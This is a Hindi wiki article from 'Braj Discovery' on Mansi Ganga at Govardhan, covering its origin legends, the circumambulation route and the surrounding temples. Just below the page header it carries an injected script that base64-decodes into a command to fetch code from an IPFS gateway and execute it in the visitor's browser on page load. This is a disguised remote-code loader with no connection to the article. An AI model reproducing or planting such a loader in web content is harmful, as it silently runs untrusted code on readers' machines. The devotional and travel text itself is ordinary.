मानसी गंगा

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
Asha (चर्चा | योगदान) द्वारा परिवर्तित ०४:२०, १२ अगस्त २००९ का अवतरण
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

साँचा:गोवर्धन-दर्शनीय-स्थल

मानसी गंगा / Mansi Ganga

गोर्वधन गाँव के बीच में श्री मानसी गंगा है । परिक्रमा करने में दायीं और पड़ती है और पूंछरी से लौटने पर भी दायीं और इसके दर्शन होते है । एक बार श्री नन्द-यशोदा एंव सभी ब्रजवासी गंगा स्नान का विचार बनाकर गंगा जी की तरफ चलने लगे । चलते चलते जब वे गोवर्धन पहुँचे तो वहाँ संध्या हो गयी । अत: रात्रि व्यतीत करने हेतु श्री नन्द महाराज ने श्री गोवर्धन में एक मनोरम स्थान सुनिश्चित किया । यहाँ पर श्री कृष्ण के मन में विचार आया कि ब्रजधाम में ही सभी-तीर्थों का वास है, परन्तु ब्रजवासीगण इसकी महान महिमा से अनभिज्ञ है । इसलिये मुझे ही इसका कोई समाधान निकालना होगा । श्री कृष्ण जी के मन में ऐसा विचार आते ही श्री गंगा जी मानसी रुप में गिरिराज की तलहटी में प्रकट हुई । प्रात:काल जब समस्त ब्रजवासियों ने गिरिराज तलहटी में श्री गंगा जी को देखा तो वे विस्मित होकर एक दूसरे से वार्तालाप करने लगे । सभी को विस्मित देख अन्तर्यामी श्री कृष्ण बोले कि- इस पावन ब्रजभूमि की सेवा हेतु तो तीनों लोकों के सभी-तीर्थ यहाँ आकर विराजते है । परन्तु फिर भी आपलोग ब्रज छोड़कर गंगास्नान हेतु जा रहे हैं । इसी कारण माता गंगा आपके सम्मुख आविर्भूत हुई हैं । अत: आपलोग शीघ्र ही इस पवित्र गंगा जल में स्नानादि कार्य सम्पन्न करें । श्री नन्द बाबा ने श्री कृष्ण की इस बात को सुनकर सब गोपों के साथ इस में स्नान किया । रात्रि को सब ने दीपावली का दान दिया । तभी से आज तक भी दीपावली के दिन यहाँ असंख्य दीपों की रोशनी की जाती है । श्री कृष्ण के मन से आविर्भूत होने के कारण यहाँ गंगाजी का नाम मानसीगंगा पड़ा । कार्तिक मास की अमावस्या तिथि को श्री गंगा जी यहाँ प्रकट हुई थी । आज भी इस तिथी को स्मरण करते हुए हजारों भक्तगण यहाँ स्नान-पूजा-अर्चना-दीप दानादि करते हैं । भाग्यवान भक्तों को कभी-कभी इसमें दूध की धारा का दर्शन होता है ।


श्री भक्ति विलास में कहा गया है- गंगे दुग्धमये देवी ! भगवन्मानसोदवे । भगवान श्री कृष्ण के मन से आविर्भूत होने वाली दुग्धमयी गंगा देवी ! आपको मैं नमस्कार करता हूँ । इस मानसी गंगा का प्रसिध्द गंगा नदी से सर्वाधिक माहात्म्य है । वह श्री भगवान के चरणों से उत्पन्न हुई है और इसकी उत्पत्ति श्री भगवान के मन से है । इस में श्री श्री राधाकृष्ण सखियों के साथ यहाँ नौका-विहार की लीला करते हैं । इस मानसी गंगा में श्री रघुनाथ दास गोस्वामीपाद ने श्री राधाकृष्ण की नौंका-विलास लीला का दर्शन किया था । मानसी गंगा में एक बार स्नान करने से जो फल प्राप्त होता है वह हजारों अश्वमेध यज्ञों तथा सैकड़ों राजसू्र्य यज्ञों के करने से प्राप्त नहीं होता हैं । [१] मानसी गंगा के तटों को पत्थरों से सीढ़ियों सहित बनवाने का श्रेय जयपुर के राजा श्री मानसिंह के पिता राजा श्री भगवानदास को है । मानसी गंगा के चारों और दर्शनीय स्थानों के दर्शन करते हुए परिक्रमा लगाते हैं ।

परिक्रमा पद्वति

मानसी गंगा की परिक्रमा किसी भी स्थान से किसी भी समय उठा सकते है । मगर जहाँ से परिक्रमा आरम्भ करें वही पर आकर परिक्रमा को विराम देना चाहिए । मुखारविन्द से परिक्रमा प्रारम्भ करते हैं । मानसी गंगा के पूर्व तट पर मुखारविन्द मन्दिर के निकट श्री लक्ष्मीनारायण मन्दिर है । यहाँ से गोवर्धन परिक्रमा मार्ग में चलते हुए श्री हरिदेव जी का मन्दिर है । फिर यहाँ से आगे परिक्रमा मार्ग में चलते हुए दानघाटी पर श्री दानबिहारी जी के मन्दिर के दर्शन होते हैं । चलते-चलते श्री लक्ष्मीनारायण मन्दिर, श्री राधामदनमोहन मन्दिर, श्री बिहारी जी मन्दिर, श्री विश्वकर्मा मन्दिर, श्री वेंकटेश्वर मन्दिर, श्री राधावल्लभ मन्दिर, यहाँ से श्री श्यामसुन्दर मन्दिर, श्री चकलेश्वर महादेव मन्दिर इत्यादि होते हुए श्री मुखारविन्द मन्दिर में आते हुए परिक्रमा को विराम देते है ।

मन्दिर तथा कुण्ड समूह

मानसी गंगा के पूर्व दिशा में

श्री मुखारविन्द, श्री लक्ष्मीनारायण मन्दिर, श्री किशोरीश्याम मन्दिर, श्री गिरिराज मन्दिर, श्री मन्महाप्रभु जी की बैठक, श्री राधाकृष्ण मन्दिर स्थित हैं ।

दक्षिण दिशा में

श्री हरिदेव मन्दिर, ब्रह्मकुण्ड, श्री मनसादेवी मन्दिर, श्री गौरादाऊ जी, श्री गन्धेश्वर महादेव जी, श्री यमुना मोहन जी, श्रीमहादेव-हनुमान जी, श्री बिहारी जी मन्दिर दर्शनीय हैं ।

पश्चिम दिशा में

श्री गिरिराज महाराज ( श्री साक्षीगोपाल ) मन्दिर, श्री विश्वकर्मा, श्री राधाकृष्ण मन्दिर स्थित है ।

उत्तर दिशा में

श्री राधाबल्लभ मन्दिर, श्री नरसिंह, श्री श्यामसुन्दर, श्री बिहारी जी, श्री लक्ष्मीनारायण, श्री नाथ जी, श्री नन्दबाबा का मन्दिर, श्री राधारमण, नूतन मन्दिर, श्री अद्वैतदास बाबा का भजन कुटीर, श्री तीनकौड़ी बाबा का आश्रम, सिद्धबाबा का भजन कुटीर, श्री राधागोविन्द मन्दिर, भागवत भजन, श्री चकलेश्वर महादेव, महाप्रभु मन्दिर, राजकुण्ड, झूलन क्रीड़ा स्थान, सिद्ध श्री हनुमान मन्दिर इत्यादि दर्शनीय हैं ।


मानसी गंगा के सभी घाटों का निर्माण जयपुर नरेश मानसिंह के पिता राजा भगवानदास ने कराया था । मानसी गंगा का बहुत महत्व है । मानसी गंगा के प्राकट्य की तीन कथायें कही जाती हैं

  1. श्रीकृष्ण ने गोपियों के कहने पर वृष हत्या के पाप से मुक्त होने के लिये अपने मन से इसे प्रकट किया तथा एवं इसमें स्नान कर पाप मुक्त हुए ।
  2. श्री नन्दबाबा और यशोदा मैया ब्रजवासियों के साथ गंगा स्नान के लिये यात्रा पर जा रहे थे । रात में इन्होंने गोवर्धन में विश्राम किया । कृष्ण ने विचार किया कि जब सारे तीर्थ ब्रज में विद्यमान हैं, तो इतनी दूर क्या जाना । कृष्ण ने भागीरथी गंगा का स्मरण किया और स्मरण करते ही गंगा वहाँ दीपावली के दिन प्रकट हो गयीं । रात्रि में सभी ने दीपदान किया तथा स्नान किया । जब से प्रतिवर्ष लाखों तीर्थयात्री यहाँ दीपावली पर स्नान करते हैं और दीपदान करते हैं
  3. श्रीकृष्ण जी की पटरानी यमुना जी ने अपनी बड़ी बहिन गंगा के ऊपर कृपा करने के लिये कृष्ण से प्रार्थना की । कृष्ण ने यमुना की प्रार्थना सुनकर उसी समय गंगा का आह्वान किया और गोपियों के साथ जल विहार कर उन्हें कृतार्थ किया ।


टीका-टिप्पणी

  1. अश्वमेधसहस्त्राणि राजसूयशतानि च । मानसीगंगाया तुल्यानि भवन्तात्र नो गिरौ ॥